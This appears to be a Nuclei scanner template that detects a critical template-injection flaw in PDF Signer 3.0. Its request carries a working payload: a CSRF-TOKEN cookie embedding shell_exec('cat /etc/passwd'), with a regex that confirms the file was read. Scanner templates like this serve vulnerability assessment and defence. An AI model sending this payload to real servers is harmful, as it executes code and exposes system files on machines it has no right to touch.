id: pdf-signer-ssti-to-rce info: name: PDF Signer 3.0 - Template Injection author: madrobot severity: critical description: PDF Signer 3.0 is susceptible to a template injection which allows code execution, due to improper cookie handling and an improper CSRF implementation. An attacker can execute code on the server in the context of the web server. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cwe-id: CWE-1336 tags: ssti,rce,csrf metadata: max-request: 1 http: - method: GET path: - "{{BaseURL}}" headers: Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl" skip-variables-check: true matchers-condition: and matchers: - type: status status: - 200 - type: regex regex: - "root:.*:0:0:" part: body # Enhanced by md on 2022/10/05